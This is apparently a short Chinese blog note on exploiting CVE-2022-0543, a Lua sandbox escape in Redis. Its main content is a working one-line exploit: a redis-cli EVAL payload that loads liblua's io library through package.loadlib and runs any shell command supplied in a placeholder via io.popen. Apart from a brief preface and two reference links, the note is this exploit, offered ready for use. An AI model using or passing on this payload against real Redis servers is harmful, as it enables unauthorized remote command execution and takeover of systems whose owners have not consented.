【笔记】CVE-2022-0543漏洞利用 发表于 2024-06-14 更新于 2026-03-17 阅读次数: 116181523903563680前言Redis利用沙盒逃逸漏洞实现远程命令执行 exp <shell>:远程执行的Shell命令 12redis-cli -h <host>127.0.0.1:6379> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("<shell>", "r"); local res = f:read("*a"); f:close(); return res' 0 完成参考文献哔哩哔哩——xiaodisecCSDN——7562ajj